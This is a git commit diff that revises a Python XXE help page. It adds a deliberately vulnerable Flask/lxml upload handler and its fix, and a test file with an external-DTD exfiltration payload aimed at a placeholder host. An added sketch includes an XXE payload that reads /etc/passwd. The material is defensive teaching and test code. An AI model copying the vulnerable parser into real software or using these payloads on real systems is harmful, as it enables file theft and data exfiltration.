Python: Adjust XXE qhelp

and remove the old copy, we don't need it anymore :)
Rasmus Wriedt Larsen
2022-03-29 13:51:00 +02:00
committed by Rasmus Wriedt Larsen
parent c365337867
commit b00766b054
7 changed files with 58 additions and 75 deletions

View File

@@ -15,29 +15,34 @@ and out-of-band data retrieval techniques may allow attackers to steal sensitive
<p>
The easiest way to prevent XXE attacks is to disable external entity handling when
parsing untrusted data. How this is done depends on the library being used. Note that some
libraries, such as recent versions of <code>libxml</code>, disable entity expansion by default,
libraries, such as recent versions of the XML libraries in the standard library of Python 3,
disable entity expansion by default,
so unless you have explicitly enabled entity expansion, no further action needs to be taken.
</p>
<p>
We recommend using the <a href="https://pypi.org/project/defusedxml/">defusedxml</a>
PyPI package, which has been created to prevent XML attacks (both XXE and XML bombs).
</p>
</recommendation>
<example>
<p>
The following example uses the <code>libxml</code> XML parser to parse a string <code>xmlSrc</code>.
If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since
the parser is invoked with the <code>noent</code> option set to <code>true</code>:
The following example uses the <code>lxml</code> XML parser to parse a string
<code>xml_src</code>. That string is from an untrusted source, so this code is
vulnerable to an XXE attack, since the <a href="https://lxml.de/apidoc/lxml.etree.html#lxml.etree.XMLParser">
default parser</a> from <code>lxml.etree</code> allows local external entities to be resolved.
</p>
<sample src="examples/Xxe.js"/>
<sample src="examples/XxeBad.py"/>
<p>
To guard against XXE attacks, the <code>noent</code> option should be omitted or set to
<code>false</code>. This means that no entity expansion is undertaken at all, not even for standard
internal entities such as <code>&amp;amp;</code> or <code>&amp;gt;</code>. If desired, these
entities can be expanded in a separate step using utility functions provided by libraries such
as <a href="http://underscorejs.org/#unescape">underscore</a>,
<a href="https://lodash.com/docs/4.17.15#unescape">lodash</a> or
<a href="https://github.com/mathiasbynens/he">he</a>.
To guard against XXE attacks with the <code>lxml</code> library, you should create a
parser with <code>resolve_entities</code> set to <code>False</code>. This means that no
entity expansion is undertaken, although standard predefined entities such as
<code>&amp;gt;</code>, for writing <code>&gt;</code> inside the text of an XML element,
are still allowed.
</p>
<sample src="examples/XxeGood.js"/>
<sample src="examples/XxeGood.py"/>
</example>
<references>
@@ -53,5 +58,13 @@ Timothy Morgen:
Timur Yunusov, Alexey Osipov:
<a href="https://www.slideshare.net/qqlan/bh-ready-v4">XML Out-Of-Band Data Retrieval</a>.
</li>
<li>
Python 3 standard library:
<a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.
</li>
<li>
Python 2 standard library:
<a href="https://docs.python.org/2/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.
</li>
</references>
</qhelp>
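
The claim in the recommendation about the Python 3 standard library can be checked with a small sketch. It assumes CPython 3's `xml.etree.ElementTree`. The payload and the helper name `parse_untrusted` are hypothetical and not part of this commit. It is an illustration of the default behaviour, not a replacement for `defusedxml`.

```python
import xml.etree.ElementTree as ET

# Hypothetical XXE payload: declares an external entity and references it.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
"""

# Predefined entities such as &lt; are part of XML itself and need no DTD.
PREDEFINED_ENTITY_XML = "<test>&lt;</test>"


def parse_untrusted(xml_src):
    """Return the root element, or None if the parser rejects the document."""
    try:
        return ET.fromstring(xml_src)
    except ET.ParseError:
        # ElementTree does not resolve external entities; the reference
        # to &xxe; is reported as an undefined entity instead.
        return None


external_result = parse_untrusted(XXE_PAYLOAD)
predefined_result = parse_untrusted(PREDEFINED_ENTITY_XML)
```

Here the external entity reference makes the parse fail rather than reading the file, while the predefined entity is decoded as usual. Other attack classes, such as XML bombs, are not covered by this check.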

View File

@@ -1,7 +0,0 @@
const app = require("express")(),
  libxml = require("libxmljs");

app.post("upload", (req, res) => {
  let xmlSrc = req.body,
    doc = libxml.parseXml(xmlSrc, { noent: true });
});

View File

@@ -0,0 +1,10 @@
from flask import Flask, request
import lxml.etree

app = Flask(__name__)

@app.post("/upload")
def upload():
    xml_src = request.get_data()
    doc = lxml.etree.fromstring(xml_src)
    return lxml.etree.tostring(doc)

View File

@@ -1,7 +0,0 @@
const app = require("express")(),
  libxml = require("libxmljs");

app.post("upload", (req, res) => {
  let xmlSrc = req.body,
    doc = libxml.parseXml(xmlSrc);
});

View File

@@ -0,0 +1,11 @@
from flask import Flask, request
import lxml.etree

app = Flask(__name__)

@app.post("/upload")
def upload():
    xml_src = request.get_data()
    parser = lxml.etree.XMLParser(resolve_entities=False)
    doc = lxml.etree.fromstring(xml_src, parser=parser)
    return lxml.etree.tostring(doc)

View File

@@ -1,48 +0,0 @@
<!DOCTYPE qhelp PUBLIC
"-//Semmle//qhelp//EN"
"qhelp.dtd">
<qhelp>
<overview>
<p>
Parsing untrusted XML files with a weakly configured XML parser may lead to attacks such as XML External Entity (XXE),
Billion Laughs, Quadratic Blowup and DTD retrieval.
This type of attack uses external entity references to access arbitrary files on a system, carry out denial of
service, or server side request forgery. Even when the result of parsing is not returned to the user, out-of-band
data retrieval techniques may allow attackers to steal sensitive data. Denial of services can also be carried out
in this situation.
</p>
</overview>
<recommendation>
<p>
Use <a href="https://pypi.org/project/defusedxml/">defusedxml</a>, a Python package aimed
to prevent any potentially malicious operation.
</p>
</recommendation>
<example>
<p>
The following example calls <code>xml.etree.ElementTree.fromstring</code> using a parser (<code>lxml.etree.XMLParser</code>)
that is not safely configured on untrusted data, and is therefore inherently unsafe.
</p>
<sample src="XmlEntityInjection.py"/>
<p>
Providing an input (<code>xml_content</code>) like the following XML content against /bad, the request response would contain the contents of
<code>/etc/passwd</code>.
</p>
<sample src="XXE.xml"/>
</example>
<references>
<li>Python 3 <a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.</li>
<li>Python 2 <a href="https://docs.python.org/2/library/xml.html#xml-vulnerabilities">XML Vulnerabilities</a>.</li>
<li>Python <a href="https://www.edureka.co/blog/python-xml-parser-tutorial/">XML Parsing</a>.</li>
<li>OWASP vulnerability description: <a href="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing">XML External Entity (XXE) Processing</a>.</li>
<li>OWASP guidance on parsing xml files: <a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#python">XXE Prevention Cheat Sheet</a>.</li>
<li>Paper by Timothy Morgen: <a href="https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/">XML Schema, DTD, and Entity Attacks</a></li>
<li>Out-of-band data retrieval: Timur Yunusov &amp; Alexey Osipov, Black hat EU 2013: <a href="https://www.slideshare.net/qqlan/bh-ready-v4">XML Out-Of-Band Data Retrieval</a>.</li>
<li>Denial of service attack (Billion laughs): <a href="https://en.wikipedia.org/wiki/Billion_laughs">Billion Laughs.</a></li>
</references>
</qhelp>

View File

@@ -74,6 +74,10 @@ exfiltrate_through_dtd_retrieval = f"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://{HOST}:{PORT}/exfiltrate-through.dtd"> %xxe; ]>
"""
predefined_entity_xml = """<?xml version="1.0"?>
<test>&lt;</test>
"""
# ==============================================================================
# other setup
@@ -443,6 +447,13 @@ class TestLxml:
        assert exfiltrated_data == "SECRET_FLAG"

    @staticmethod
    def test_predefined_entity():
        parser = lxml.etree.XMLParser(resolve_entities=False)
        root = lxml.etree.fromstring(predefined_entity_xml, parser=parser)

        assert root.tag == "test"
        assert root.text == "<"
# ==============================================================================
import xmltodict